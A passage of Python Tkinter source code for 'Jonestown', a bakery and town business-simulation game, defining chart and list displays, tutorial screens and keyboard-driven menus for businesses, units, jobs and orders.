printout.grid(row=2, column=0, sticky='nsew')
#rightSide grid
charDisplay.grid(row=0, column=0, sticky='nsew')
keyboard.grid( row=1, column=0, sticky="nsew")
rightSide.grid_rowconfigure(1, weight=1)
rightSide.grid_rowconfigure(0, weight=1)
quitter.grid( row=3, column=0, sticky="nsew")
def getChar(self):
return self.char
def addChar(self, char):
self.char = char
def get_display_cont(self):
return self.display_cont
def get_text_cont(self):
return self.text_cont
def out(self, text):
self.text_cont.out(text)
#display
class display_controller(tk.Frame):
def __init__(self, parent, root, *args, **kwargs):
from tutorials import tutorials
tk.Frame.__init__(self, master=parent, *args, **kwargs)
self.root = root
self.grid_rowconfigure(0, weight=1)
self.grid_columnconfigure(0, weight=1)
self.grid()
self.frames = {}
for display in (matplotlib_display, list_display):
page_name = display.__name__
frame = display(parent=self, controller=self, root=root)
self.frames[page_name] = frame
#stack frames
frame.grid(row=0, column=0, sticky="nsew")
i = 0
for page_name in ("main_display", "other_display"):
frame = tutorial(parent=self, controller=self, root=root, text=tutorials[i])
self.frames[page_name] = frame
frame.grid(row=0, column=0, sticky="nsew")
i += 1
self.show_frame("main_display")
def show_frame(self, page_name):
frame = self.frames[page_name]
frame.raise_frame()
def update_frame(self, page_name, *args):
frame = self.frames[page_name]
frame.update_frame(*args)
self.show_frame(page_name)
def bar_chart(self, x, y, xlabel, ylabel, title):
self.frames["matplotlib_display"].bar_chart(x, y, xlabel, ylabel, title)
self.show_frame("matplotlib_display")
def display_lists(self, col1, col2=None, col3=None, col4=None):
lists = [col1, col2, col3, col4]
columns = []
for array in lists:
string = ""
for item in array:
string += "\n" + str(item)
class tutorial(tk.Frame):
def __init__(self, parent, controller, root, text):
tk.Frame.__init__(self, parent)
self.root = root
leftBarImage = tk.PhotoImage( file="./images/greenWheat.gif")
rightBarImage = tk.PhotoImage(file="./images/nightWheat.gif")
parchment = tk.PhotoImage( file='./images/parchment.gif')
leftBar = tk.Label(self, image=leftBarImage, width= 150, height=510)
leftBar.image = leftBarImage
self.mainScreen_var = tk.StringVar()
# intro = """Welcome to Jonestown!
# You have just inherited a small bakery from your beloved Uncle Bill.
# Before he died you vowed to him that you would keep his business going.
# He left the bakery well provisioned for the next few days, but you're
# going to need to build a farm and a mill immediately if you plan on staying in
# business.
# Don't let Uncle Bill down!
# """
self.mainScreen_var.set(text)
mainScreen = tk.Label(self, image=parchment, textvar=self.mainScreen_var,font=TEXT_FONT, width=800, height=500, borderwidth=5,
relief=tk.RIDGE, compound=tk.CENTER)
mainScreen.image = parchment
rightBar = tk.Label(self, image=rightBarImage, width=150, height=510)
rightBar.image = rightBarImage
leftBar.pack(side=tk.LEFT)
mainScreen.pack(side=tk.LEFT, expand=True)
rightBar.pack(side=tk.LEFT)
def raise_frame(self):
self.tkraise()
# def employees(self, unitEmpDict):
# text = "Staff"
# for unit in unitEmpDict.keys():
# text += "\n\n" + unit.name + " employees:"
# for employee in unitEmpDict[unit]:
# if unitEmpDict[unit].index(employee) % 3 == 0:
# text += "\n"
# text += employee.name + " (" + employee.job.jobType +") "
# self.mainScreen_var.set(text)
class matplotlib_display(tk.Frame):
def __init__(self, parent, controller, root):
tk.Frame.__init__(self, parent)
self.root = root
leftBarImage = tk.PhotoImage(file="./images/greenWheat.gif")
rightBarImage = tk.PhotoImage(file="./images/nightWheat.gif")
leftBar = tk.Label(self, image=leftBarImage, width= 150, height=510)
leftBar.image = leftBarImage
self.fig = Figure(figsize=(6,5), dpi=100)
self.canvas = FigureCanvasTkAgg(self.fig, self)
self.canvas.show()
graphScreen = self.canvas.get_tk_widget()
rightBar = tk.Label(self, image=rightBarImage, width=150, height=510)
rightBar.image = rightBarImage
leftBar.pack(side=tk.LEFT)
graphScreen.pack(side=tk.LEFT, expand=True)
rightBar.pack(side=tk.LEFT)
# x, y are arrays
def bar_chart(self, x, y, xlabel, ylabel, title):
self.fig.clf()
graph = self.fig.add_subplot(1,1,1)
x_fill = [i for i in range(len(x))]
graph.bar(x_fill,y)
graph.set_title(title)
graph.set_xlabel(xlabel)
graph.set_ylabel(ylabel)
graph.set_xticks(range(len(x)))
graph.set_xticklabels(x)
def raise_frame(self):
self.canvas.show()
self.tkraise()
class list_display(tk.Frame):
def __init__(self, parent, controller, root):
tk.Frame.__init__(self, parent)
self.root = root
leftBarImage = tk.PhotoImage( file="./images/greenWheat.gif")
rightBarImage = tk.PhotoImage(file="./images/nightWheat.gif")
parchment = tk.PhotoImage( file='./images/parchment.gif')
leftBar = tk.Label(self, image=leftBarImage, width= 150, height=500)
leftBar.image = leftBarImage
self.col1_var = tk.StringVar()
self.col2_var = tk.StringVar()
self.col3_var = tk.StringVar()
self.col4_var = tk.StringVar()
title1 = tk.Label(self, image=parchment, text="Test",font=TITLE_FONT, width=190, height=30, borderwidth=5,
relief=tk.RIDGE, compound=tk.CENTER)
title2 = tk.Label(self, image=parchment, text="Test",font=TITLE_FONT, width=190, height=30, borderwidth=5,
relief=tk.RIDGE, compound=tk.CENTER)
title3 = tk.Label(self, image=parchment, text="Test",font=TITLE_FONT, width=190, height=30, borderwidth=5,
relief=tk.RIDGE, compound=tk.CENTER)
title4 = tk.Label(self, image=parchment, text="Test",font=TITLE_FONT, width=190, height=30, borderwidth=5,
relief=tk.RIDGE, compound=tk.CENTER)
col1 = tk.Label(self, image=parchment, textvar=self.col1_var,font=TEXT_FONT, width=190, height=450, borderwidth=5,
relief=tk.RIDGE, compound=tk.CENTER)
col2 = tk.Label(self, image=parchment, textvar=self.col2_var,font=TEXT_FONT, width=190, height=450, borderwidth=5,
relief=tk.RIDGE, compound=tk.CENTER)
col3 = tk.Label(self, image=parchment, textvar=self.col3_var,font=TEXT_FONT, width=190, height=450, borderwidth=5,
relief=tk.RIDGE, compound=tk.CENTER)
col4 = tk.Label(self, image=parchment, textvar=self.col4_var,font=TEXT_FONT, width=190, height=450, borderwidth=5,
relief=tk.RIDGE, compound=tk.CENTER)
col1.image = parchment
rightBar = tk.Label(self, image=rightBarImage, width=150, height=500)
rightBar.image = rightBarImage
leftBar.grid(row=0, column=0, rowspan=2)
title1.grid(row=0, column=1)
title2.grid(row=0, column=2)
title3.grid(row=0, column=3)
title4.grid(row=0, column=4)
col1.grid(row=1, column=1)
col2.grid(row=1, column=2)
col3.grid(row=1, column=3)
col4.grid(row=1, column=4)
rightBar.grid(row=0, column=5, rowspan=2)
def raise_frame(self):
self.tkraise()
self.display_lists(["hello", "world", "I", "see", "you"], [1,2,3,43,4], ["So", "here", "we", "are"])
def display_lists(self, col1, col2=None, col3=None, col4=None):
lists = [col1, col2, col3, col4]
titles = []
columns = [self.col1_var, self.col2_var, self.col3_var, self.col4_var]
for i in range(len(lists)):
if lists[i] is not None:
string = ""
for item in lists[i]:
string += "\n" + str(item)
columns[i].set(string)
#printout
class text_output(tk.Frame):
def __init__(self, parent, root, *args, **kwargs):
tk.Frame.__init__(self, master=parent, *args, **kwargs)
self.root = root
self.text = tk.Text(self, background="gray", state='normal', font=TEXT_FONT, width=159, height=20)
self.text.grid(row=0, column=0, sticky='nsew')
self.out("Welcome to Jonestown!")
def out(self, text):
self.text.insert(tk.INSERT, text)
def clear(self):
self.text.delete(1.0, tk.END)
#static_data
class static_data(tk.Frame):
def __init__(self, parent, root, *args, **kwargs):
tk.Frame.__init__(self, master=parent, *args, **kwargs)
self.root = root
self.charName = tk.StringVar()
self.age = tk.StringVar()
self.locality = tk.StringVar()
# self.marriage = tk.StringVar()
self.netWorth = tk.IntVar()
header = tk.Label(self, text='Jonestown', font=TITLE_FONT)
nameLabel = tk.Label(self, textvariable=self.charName, anchor='w', font=TEXT_FONT)
ageLabel = tk.Label(self, textvariable=self.age, anchor='w', font=TEXT_FONT)
localityLabel = tk.Label(self, textvariable=self.locality, anchor='w', font=TEXT_FONT)
# marriageLabel = tk.Label(self, textvariable=self.marriage)
netWorthLabel = tk.Label(self, textvariable=self.netWorth, anchor='w', font=TEXT_FONT)
self.root.bind("<<refresh>>", self.update_frame)
self.update_frame()
self.set_hotkeys()
header.pack(fill=tk.X)
nameLabel.pack(fill=tk.X)
ageLabel.pack(fill=tk.X)
localityLabel.pack(fill=tk.X)
# marriageLabel.pack(fill=tk.X)
netWorthLabel.pack(fill=tk.X)
def update_frame(self, event=None):
char = self.root.getChar()
self.charName.set(char.getName())
self.age.set("You are " + str(char.getAge()) + " years old.")
self.locality.set("You live in the town of " + char.getLocality().getName() + ".")
#should account for property
self.netWorth.set("Net worth: $" + str(char.getCapital()))
def set_hotkeys(self):
pass
#controller for which keyboard
class key_controller(tk.Frame):
def __init__(self, parent, root, *args, **kwargs):
tk.Frame.__init__(self, master=parent, *args, **kwargs)
self.root = root
self.root.event_generate("<<refresh>>", when="tail")
self.grid_rowconfigure(0, weight=1)
self.grid_columnconfigure(0, weight=1)
self.grid()
self.frames = {}
for keyboard in (main_keyboard,
new_business, businessData,
new_unit, unitData,
new_job, jobData,
ordersMenu, new_order,
market, new_transfer,
house, town):
page_name = keyboard.__name__
frame = keyboard(parent=self, controller=self, root=root)
self.frames[page_name] = frame
#stack frames
frame.grid(row=0, column=0, sticky="nsew")
self.show_frame("main_keyboard")
def show_frame(self, page_name, *args):
frame = self.frames[page_name]
frame.raise_frame(*args)
def get_display_cont(self):
return self.root.get_display_cont()
def get_text_cont(self):
return self.root.get_text_cont()
def get_business(self):
return self.frames["businessData"].business
def get_unit(self):
return self.frames["unitData"].unit
def get_job(self):
return self.frames["jobData"].job
def isInt(self, P):
isInt = False
try:
int('0' + P)
isInt = True
except ValueError:
isInt = False
return isInt
def create_order(self, order_var, amount_var):
def callback():
import orders as o
business = self.get_business()
job = self.get_job()
materialIndex = d.getMaterials().index(order_var.get())
order = business.craftOrderManager(job, materialIndex)
order.setAmount(int(amount_var.get()))
self.root.event_generate("<<refresh>>", when="tail")
return callback
def set_order_amount(self, order, amountVar):
def callback():
order.setAmount(int(amountVar.get()))
return callback
def create_transfer(self, order_var, amount_var):
def callback():
import orders as o
business = self.get_business()
manager = self.get_unit().getJobList()[0]
materialIndex = d.getMaterials().index(order_var.get())
transfer = business.transferOrderManager(manager, self.get_unit(), materialIndex)
transfer.setAmount(int(amount_var.get()))
self.root.event_generate("<<refresh>>", when="tail")
return callback
def show_production(self, entity):
display_cont = self.root.get_display_cont()
xy = entity.getProduction()
products = [d.getMaterials()[xy[0][i]] for i in range(len(xy[0]))]
display_cont.bar_chart(products, xy[1], "Products", "Crafted", entity.name + " Production")
def show_employees(self, entity):
display_cont = self.root.get_display_cont()
empDict = entity.get_emp_dict()
x = []
y = []
for key in list(empDict.keys()):
x.append(key.name)
y.append(len(empDict[key]))
display_cont.bar_chart(x, y, "Employment", "Employees", entity.name + " Staff")
def show_stock(self, entity):
display_cont = self.root.get_display_cont()
x = d.getMaterials()
y = entity.getAllStock()
display_cont.bar_chart(x, y, "Materials", "Amount", entity.name +" Stock")
class main_keyboard(tk.Frame):
def __init__(self, parent, controller, root):
tk.Frame.__init__(self, parent)
self.controller = controller
self.root = root
self.hotkeys = ["h", "t", "n"]
self.dynamic_buttons = []
header = tk.Label(self, text="Office", font=TITLE_FONT)
house = tk.Button(self, text="h. House", font=BUTTON_FONT, command=lambda: controller.show_frame("house"))
town = tk.Button(self, text="t. Town", font=BUTTON_FONT, command=lambda: controller.show_frame("town"))
new_bus = tk.Button(self, text="n. New Business", font=BUTTON_FONT, command=lambda: controller.show_frame("new_business"))
header.pack(fill=tk.X)
house.pack(fill=tk.X)
town.pack(fill=tk.X)
new_bus.pack(fill=tk.X)
def callback_factory(self, business):
def callback(event=None):
self.controller.show_frame("businessData", business)
return callback
def raise_frame(self):
for button in self.dynamic_buttons:
button.destroy()
char = self.root.getChar()
businesses = char.getBusinesses()
key = 1
for business in businesses:
busi_name = business.getName()
callback = self.callback_factory(business)
newButton = tk.Button(self, text= str(callback) + ". " + busi_name, font=BUTTON_FONT, command=callback)
newButton.callback = callback
newButton.pack(fill=tk.X)
self.dynamic_buttons.append(newButton)
key += 1
self.set_hotkeys()
self.tkraise()
def set_hotkeys(self):
for hotkey in self.root.hotkeys:
self.root.unbind(hotkey)
for hotkey in self.root.dynamic_hotkeys:
self.root.unbind(hotkey)
self.root.dynamic_hotkeys = []
self.root.hotkeys = self.hotkeys
self.root.bind("h", lambda x: self.controller.show_frame("house"))
self.root.bind("t", lambda x: self.controller.show_frame("town"))
self.root.bind("n", lambda x: self.controller.show_frame("new_business"))
key = 1
for button in self.dynamic_buttons:
self.root.bind(str(key), button.callback)
self.root.dynamic_hotkeys.append(str(key))
key += 1
class new_business(tk.Frame):
def __init__(self, parent, controller, root):
tk.Frame.__init__(self, parent)
self.controller = controller
self.root = root
self.hotkeys = ["<Return>", "<Escape>"]
header = tk.Label(self, text="Create a New Business", font=TITLE_FONT)
enter_name = tk.Label(self, text="Enter name:", font=TEXT_FONT)
self.business_name = tk.StringVar()
self.name = tk.Entry(self, textvariable=self.business_name)
cash = tk.Label(self, text="Starting cash:", font=TEXT_FONT)
self.amountVar = tk.StringVar()
vcmd = (self.register(self.controller.isInt), '%P')
amount = tk.Entry(self, validatecommand=vcmd, validate="key", textvariable=self.amountVar)
ok = tk.Button(self, text="[enter]", font=BUTTON_FONT, command=self.create_business)
esc = tk.Button(self, text="[esc] Return to office", font=BUTTON_FONT, command=lambda: controller.show_frame("main_keyboard"))
header.pack()
enter_name.pack()
self.name.pack()
cash.pack()
amount.pack()
ok.pack()
esc.pack(fill=tk.X)
def raise_frame(self):
self.set_hotkeys()
self.tkraise()
self.name.focus()
def set_hotkeys(self):
for hotkey in self.root.hotkeys:
self.root.unbind(hotkey)
for hotkey in self.root.dynamic_hotkeys:
self.root.unbind(hotkey)
self.root.dynamic_hotkeys = []
self.root.hotkeys = self.hotkeys
self.root.bind("<Return>", lambda event: self.create_business())
self.root.bind("<Escape>", lambda event: self.controller.show_frame("main_keyboard"))
def create_business(self):
busiName = self.business_name.get()
busiCash = int("0" + self.amountVar.get())
new_bus = self.root.char.startBusiness(busiName, busiCash)
if new_bus is not None:
self.root.out("\n" + busiName + " created!")
else:
self.root.out("\nYou don't have enough money..")
self.business_name.set("Done!")
self.root.event_generate("<<refresh>>", when="tail")
class businessData(tk.Frame):
def __init__(self, parent, controller, root):
tk.Frame.__init__(self, parent)
self.controller = controller
self.root = root
self.dynamic_buttons = []
self.hotkeys = ["u", "p", "e", "n", "<Escape>"]
self.business = None
self.busiName = tk.StringVar()
self.busiName.set("nothing")
header = tk.Label(self, textvariable=self.busiName, font=TITLE_FONT)
production = tk.Button(self, text="[p] Production", font=BUTTON_FONT, command=lambda: controller.show_production(self.business))
employees = tk.Button(self, text="[e] Employees", font=BUTTON_FONT, command=lambda: controller.show_employees(self.business))
new_unit = tk.Button(self, text="[n] New Unit", font=BUTTON_FONT, command=lambda: controller.show_frame("new_unit", business))
callback = lambda event: self.controller.show_frame("main_keyboard")
self.esc = tk.Button(self, text="[esc] Return to Office", font=BUTTON_FONT, command=callback)
self.esc.callback = callback
header.pack(fill=tk.X)
production.pack(fill=tk.X)
employees.pack(fill=tk.X)
new_unit.pack(fill=tk.X)
self.esc.pack(fill=tk.X)
def setBusiness(self, business):
self.business = business
self.busiName.set(business.getName())
def raise_frame(self, business):
for button in self.dynamic_buttons:
button.destroy()
self.setBusiness(business)
char = self.root.getChar()
units = business.getUnits()
key = 1
for unit in units:
unit_name = unit.getName()
callback = lambda event: self.controller.show_frame("unitData", business, unit)
newButton = tk.Button(self, text=str(key) + ". " + unit_name, font=BUTTON_FONT, command=callback)
newButton.callback = callback
newButton.pack(fill=tk.X)
self.dynamic_buttons.append(newButton)
key += 1
self.esc.pack_forget()
self.esc.pack(fill=tk.X)
self.set_hotkeys()
self.tkraise()
def set_hotkeys(self):
for hotkey in self.root.hotkeys:
self.root.unbind(hotkey)
for hotkey in self.root.dynamic_hotkeys:
self.root.unbind(hotkey)
self.root.dynamic_hotkeys = []
self.root.hotkeys = self.hotkeys
self.root.bind("u", lambda event: self.controller.show_frame("unitMenu"))
self.root.bind("p", lambda event: self.controller.show_production(self.business))
self.root.bind("e", lambda event: self.controller.show_employees(self.business))
self.root.bind("n", lambda event: self.controller.show_frame("new_unit", self.business))
self.root.bind("<Escape>", lambda event: self.controller.show_frame("main_keyboard"))
key = 1
for button in self.dynamic_buttons:
self.root.bind(str(key), button.callback)
self.root.dynamic_hotkeys.append(str(key))
key += 1
class new_unit(tk.Frame):
def __init__(self, parent, controller, root):
tk.Frame.__init__(self, parent)
self.controller = controller
self.root = root
self.dynamic_buttons = []
self.hotkeys = ["<Return>", "<Escape>"]
self.business = None
header = tk.Label(self, text="New Unit", font=TITLE_FONT)
unit_label = tk.Label(self, text="Choose a Unit type:", font=TEXT_FONT)
self.unit_var = tk.StringVar()
self.unit_name = tk.StringVar()
unit_list = self.get_units()
units = tk.OptionMenu(self, self.unit_var, *unit_list)
name_label = tk.Label(self, text="Name your new Unit:", font=TEXT_FONT)
self.name = tk.Entry(self, textvariable=self.unit_name)
ok = tk.Button(self, text="[enter]", font=BUTTON_FONT, command=self.create_unit)
callback = lambda event: self.controller.show_frame("businessData", business)
self.esc = tk.Button(self, text="[esc] Return to Business", font=BUTTON_FONT, command=callback)
self.esc.callback = callback
header.pack()
unit_label.pack()
units.pack()
name_label.pack()
self.name.pack()
ok.pack()
self.esc.pack()
def raise_frame(self, business):
self.esc.destroy()
callback = lambda event: self.controller.show_frame("businessData", business)
self.esc = tk.Button(self, text="[esc] Return to Business", font=BUTTON_FONT, command=callback)
self.esc.callback = callback
self.esc.pack(fill=tk.X)
self.set_hotkeys()
self.tkraise()
self.name.focus()
def set_hotkeys(self):
for hotkey in self.root.hotkeys:
self.root.unbind(hotkey)
for hotkey in self.root.dynamic_hotkeys:
self.root.unbind(hotkey)
self.root.dynamic_hotkeys = []
self.root.hotkeys = self.hotkeys
self.name.bind("<Return>", lambda x: self.create_unit())
self.root.bind("<Escape>", self.esc.callback)
def get_units(self):
from unit import all_units
unit_list = []
for unit in all_units():
unit_list.append(unit.unitType)
return unit_list
def create_unit(self):
from unit import all_units
unitType = self.unit_var.get()
for unit in all_units():
if unit.unitType == unitType:
break
name = self.unit_name.get()
business = self.controller.get_business()
locality = business.locality
location = locality.find_property()
new_unit = unit(name, locality, location, business)
self.unit_name.set(new_unit)
self.root.event_generate("<<refresh>>", when="tail")
class unitData(tk.Frame):
def __init__(self, parent, controller, root):
tk.Frame.__init__(self, parent)
self.controller = controller
self.root = root
self.dynamic_buttons = []
self.hotkeys = ["p", "e", "m", "<Escape>"]
self.business = None
self.unit = None
self.unitName = tk.StringVar()
self.unitName.set("nothing")
header = tk.Label(self, textvariable=self.unitName, font=TITLE_FONT)
production = tk.Button(self, text="[p] Production", font=BUTTON_FONT, command=lambda: controller.show_production(self.unit))
employees = tk.Button(self, text="[e] Employees", font=BUTTON_FONT, command=lambda: controller.show_employees(self.unit))
market = tk.Button(self, text="[m] Market", font=BUTTON_FONT, command=lambda: controller.show_frame("market", self.business, self.unit))
new_job = tk.Button(self, text="[n] New job", font=BUTTON_FONT, command=lambda: controller.show_frame("new_job", self.business, self.unit))
callback = lambda event: self.controller.show_frame("businessData", self.business)
self.esc = tk.Button(self, text="[esc] Return to Business", font=BUTTON_FONT, command=callback)
self.esc.callback = callback
header.pack(fill=tk.X)
production.pack(fill=tk.X)
employees.pack(fill=tk.X)
market.pack(fill=tk.X)
new_job.pack(fill=tk.X)
self.esc.pack(fill=tk.X)
def setUnit(self, unit):
self.unit = unit
self.unitName.set(unit.getName())
def raise_frame(self, business, unit):
for button in self.dynamic_buttons:
button.destroy()
self.esc.destroy()
self.business = business
self.setUnit(unit)
char = self.root.getChar()
jobs = unit.getJobList()
key = 1
for job in jobs:
job_name = job.jobType
callback = lambda event: self.controller.show_frame("jobData", business, unit, job)
newButton = tk.Button(self, text=str(key) + ". " + job_name, font=BUTTON_FONT, command=callback)
newButton.callback = callback
newButton.pack(fill=tk.X)
self.dynamic_buttons.append(newButton)
key += 1
callback = lambda event: self.controller.show_frame("businessData", business)
self.esc = tk.Button(self, text="[esc] Return to Business", font=BUTTON_FONT, command=callback)
self.esc.callback = callback
self.esc.pack(fill=tk.X)
self.set_hotkeys()
self.tkraise()
def set_hotkeys(self):
for hotkey in self.root.hotkeys:
self.root.unbind(hotkey)
for hotkey in self.root.dynamic_hotkeys:
self.root.unbind(hotkey)
self.root.dynamic_hotkeys = []
self.root.hotkeys = self.hotkeys
# self.root.bind("j", lambda x: self.controller.show_frame("jobsMenu"))
self.root.bind("p", lambda event: self.controller.show_production(self.unit))
self.root.bind("e", lambda event: self.controller.show_employees(self.unit))
self.root.bind("m", lambda event: self.controller.show_frame("market"))
self.root.bind("n", lambda event: self.controller.show_frame("new_job"))
self.root.bind("<Escape>", self.esc.callback)
key = 1
for button in self.dynamic_buttons:
self.root.bind(str(key), button.callback)
self.root.dynamic_hotkeys.append(str(key))
key += 1
# class jobsMenu(tk.Frame):
# def __init__(self, parent, controller, root):
# tk.Frame.__init__(self, parent)
# self.controller = controller
# self.root = root
# self.hotkeys = ["n", "<BackSpace>", "<Escape>"]
# self.dynamic_buttons = []
# header = tk.Label(self, text="Jobs", font=TITLE_FONT)
# new_job = tk.Button(self, text="n. New job", font=BUTTON_FONT, command=lambda: controller.show_frame("new_job"))
# self.back = tk.Button(self, text="bsp. Back", font=BUTTON_FONT, command=lambda: controller.show_frame("unitData"))
# self.main = tk.Button(self, text="esc. Back to office", font=BUTTON_FONT, command=lambda: controller.show_frame("main_keyboard"))
# header.pack()
# new_job.pack(fill=tk.X)
# self.main.pack(fill=tk.X)
# def callbackFactory(self, job):
# def callback(event=None):
# return self.controller.show_frame("jobData", job)
# return callback
# def raise_frame(self):
# for button in self.dynamic_buttons:
# button.destroy()
# char = self.root.getChar()
# unit = self.controller.get_unit()
# jobs = unit.getJobList()
# key = 1
# for job in jobs:
# job_name = job.jobType
# callback = self.callbackFactory(job)
# newButton = tk.Button(self, text=str(key) + ". " + job_name, font=BUTTON_FONT, command=callback)
# newButton.callback = callback
# newButton.pack(fill=tk.X)
# self.dynamic_buttons.append(newButton)
# key += 1
# self.back.pack_forget()
# self.main.pack_forget()
# self.back.pack(fill=tk.X)
# self.main.pack(fill=tk.X)
# self.set_hotkeys()
# self.tkraise()
# def set_hotkeys(self):
# for hotkey in self.root.hotkeys:
# self.root.unbind(hotkey)
# for hotkey in self.root.dynamic_hotkeys:
# self.root.unbind(hotkey)
# self.root.dynamic_hotkeys = []
# self.root.hotkeys = self.hotkeys
# self.root.bind("n", lambda x: self.controller.show_frame("new_job"))
# self.root.bind("<BackSpace>", lambda x: self.controller.show_frame("unitData"))
# self.root.bind("<Escape>", lambda x: self.controller.show_frame("main_keyboard"))
# key = 1
# for button in self.dynamic_buttons:
# self.root.bind(str(key), button.callback)
# self.root.dynamic_hotkeys.append(str(key))
# key += 1
class new_job(tk.Frame):
def __init__(self, parent, controller, root):
tk.Frame.__init__(self, parent)
self.controller = controller
self.root = root
self.hotkeys = ["<Return>", "<Escape>"]
header = tk.Label(self, text="New Job", font=TITLE_FONT)
self.job_var = tk.StringVar()
job_list = self.get_jobs()
jobs = tk.OptionMenu(self, self.job_var, *job_list)
ok = tk.Button(self, text="[enter]", font=BUTTON_FONT, command=self.create_job)
# back = tk.Button(self, text="Back", font=BUTTON_FONT, command=lambda: controller.show_frame("unitData"))
self.esc = tk.Button(self, text="[esc] Return to Unit", font=BUTTON_FONT, command=lambda: controller.show_frame("unitData", unit))
header.pack()
jobs.pack()
ok.pack()
# back.pack(fill=tk.X)
self.esc.pack(fill=tk.X)
def raise_frame(self, business, unit):
self.esc.destroy()
callback = lambda event: self.controller.show_frame("unitData", unit)
self.esc = tk.Button(self, text="[esc] Return to Unit", font=BUTTON_FONT, command=callback)
self.esc.callback = callback
self.esc.pack(fill=tk.X)
self.set_hotkeys()
self.tkraise()
def set_hotkeys(self):
for hotkey in self.root.hotkeys:
self.root.unbind(hotkey)
for hotkey in self.root.dynamic_hotkeys:
self.root.unbind(hotkey)
self.root.dynamic_hotkeys = []
self.root.hotkeys = self.hotkeys
self.root.bind("<Return>", lambda event: self.create_job())
self.root.bind("<Escape>", self.esc.callback)
def get_jobs(self):
from jobs import all_jobs
job_list = []
for job in all_jobs():
job_list.append(job.jobType)
return job_list
def create_job(self):
from jobs import all_jobs
jobType = self.job_var.get()
for job in all_jobs():
if job.jobType == jobType:
break
new_job = job(10, self.controller.get_business(), self.controller.get_unit(), 40)
self.root.event_generate("<<refresh>>", when="tail")
class jobData(tk.Frame):
def __init__(self, parent, controller, root):
tk.Frame.__init__(self, parent)
self.controller = controller
self.root = root
self.hotkeys = ["o", "e", "<BackSpace>", "<Escape>"]
self.job = None
self.jobName = tk.StringVar()
self.jobName.set("nothing")
header = tk.Label(self, textvariable=self.jobName, font=TITLE_FONT)
orders = tk.Button(self, text="(o) Orders", font=BUTTON_FONT, command=lambda: controller.show_frame("ordersMenu"))
production = tk.Button(self, text="Production", font=BUTTON_FONT)
employees = tk.Button(self, text="(e) Employees" , font=BUTTON_FONT, command=lambda: controller.show_employees(self.job))
ledger = tk.Button(self, text="Ledger", font=BUTTON_FONT)
back = tk.Button(self, text="(bsp) Other jobs", font=BUTTON_FONT, command=lambda: controller.show_frame("jobsMenu"))
units = tk.Button(self, text="(esc) Other units", font=BUTTON_FONT, command=lambda: controller.show_frame("unitMenu") )
header.pack(fill=tk.X)
orders.pack(fill=tk.X)
production.pack(fill=tk.X)
employees.pack(fill=tk.X)
ledger.pack(fill=tk.X)
back.pack(fill=tk.X)
def setJob(self, job):
self.job = job
self.jobName.set(job.jobType)
def raise_frame(self, job=None):
if job is not None:
self.setJob(job)
self.set_hotkeys()
self.tkraise()
def set_hotkeys(self):
for hotkey in self.root.hotkeys:
self.root.unbind(hotkey)
for hotkey in self.root.dynamic_hotkeys:
self.root.unbind(hotkey)
self.root.dynamic_hotkeys = []
self.root.hotkeys = self.hotkeys
self.root.bind("o", lambda x: self.controller.show_frame("ordersMenu"))
# self.root.bind("p", lambda x: self.controller.show_production(self.unit))
self.root.bind("e", lambda x: self.controller.show_employees(self.job))
self.root.bind("<BackSpace>", lambda x: self.controller.show_frame("jobsMenu"))
self.root.bind("<Escape>", lambda x: self.controller.show_frame("unitMenu"))
class ordersMenu(tk.Frame):
def __init__(self, parent, controller, root):
tk.Frame.__init__(self, parent)
self.controller = controller
self.root = root
self.hotkeys = ["n", "<BackSpace>", "<Escape>"]
self.dynamic_entries = []
header = tk.Label(self, text="Orders", font=TITLE_FONT)
new_order = tk.Button(self, text="n. New order", font=BUTTON_FONT, command=lambda: controller.show_frame("new_order"))
self.back = tk.Button(self, text="bsp. Back", font=BUTTON_FONT, command=lambda: controller.show_frame("jobData"))
self.main = tk.Button(self, text="esc. Back to office", font=BUTTON_FONT, command=lambda: controller.show_frame("main_keyboard"))
header.pack()
new_order.pack(fill=tk.X)
self.main.pack()
def cull_wrong_orders(self, orders):
culled_orders = []
for order in orders:
if order.getJob() == self.controller.get_job():
culled_orders.append(order)
return culled_orders
def raise_frame(self):
for entry in self.dynamic_entries:
entry.destroy()
char = self.root.getChar()
job = self.controller.get_job()
raw_orders = job.getBusiness().getCraftOrders()
orders = self.cull_wrong_orders(raw_orders)
for order in orders:
newFrame = tk.Frame(self)
newCaption = tk.Label(newFrame, font=BUTTON_FONT, text=d.getMaterials()[order.getProductIndex()] + ":")
amountVar = tk.StringVar()
amountVar.set(order.getAmount())
vcmd = (self.register(self.controller.isInt), '%P')
newEntry = tk.Entry(newFrame, validatecommand=vcmd, validate="key", textvariable=amountVar)
newButton = tk.Button(newFrame, font=BUTTON_FONT, text="Ok", command=self.controller.set_order_amount(order, amountVar))
newCaption.pack(side=tk.LEFT)
newEntry.pack(side=tk.LEFT)
newButton.pack(side=tk.LEFT)
newFrame.pack()
self.dynamic_entries.append(newFrame)
self.back.pack_forget()
self.main.pack_forget()
self.back.pack(fill=tk.X)
self.main.pack(fill=tk.X)
self.set_hotkeys()
self.tkraise()
def set_hotkeys(self):
for hotkey in self.root.hotkeys:
self.root.unbind(hotkey)
for hotkey in self.root.dynamic_hotkeys:
self.root.unbind(hotkey)
self.root.dynamic_hotkeys = []
self.root.hotkeys = self.hotkeys
self.root.bind("n", lambda x: self.controller.show_frame("new_order"))
self.root.bind("<BackSpace>", lambda x: self.controller.show_frame("jobData"))
self.root.bind("<Escape>", lambda x: self.controller.show_frame("main_keyboard"))
class new_order(tk.Frame):
def __init__(self, parent, controller, root):
tk.Frame.__init__(self, parent)
self.controller = controller
self.root = root
self.hotkeys = ["<Return>", "<Escape>"]
header = tk.Label(self, text="Create a new Order", font=TITLE_FONT)
products = copy.copy(d.getMaterials())
self.order_var = tk.StringVar()
order = tk.OptionMenu(self, self.order_var, *products)
self.amount_var = tk.StringVar()
vcmd = (self.register(self.controller.isInt), '%P')
amount = tk.Entry(self, validatecommand=vcmd, validate="key", textvariable=self.amount_var)
ok = tk.Button(self, text="OK", font=BUTTON_FONT, command=self.controller.create_order(self.order_var, self.amount_var))
back = tk.Button(self, text="Back", font=BUTTON_FONT, command=lambda: controller.show_frame("ordersMenu"))
main = tk.Button(self, text="esc. Back to office", font=BUTTON_FONT, command=lambda: controller.show_frame("main_keyboard"))
header.pack()
order.pack()
amount.pack()
ok.pack()
back.pack()
main.pack()
def raise_frame(self):
self.set_hotkeys()
self.tkraise()
def set_hotkeys(self):
for hotkey in self.root.hotkeys:
self.root.unbind(hotkey)
for hotkey in self.root.dynamic_hotkeys:
self.root.unbind(hotkey)
self.root.dynamic_hotkeys = []
self.root.hotkeys = self.hotkeys
#I don't know why this works
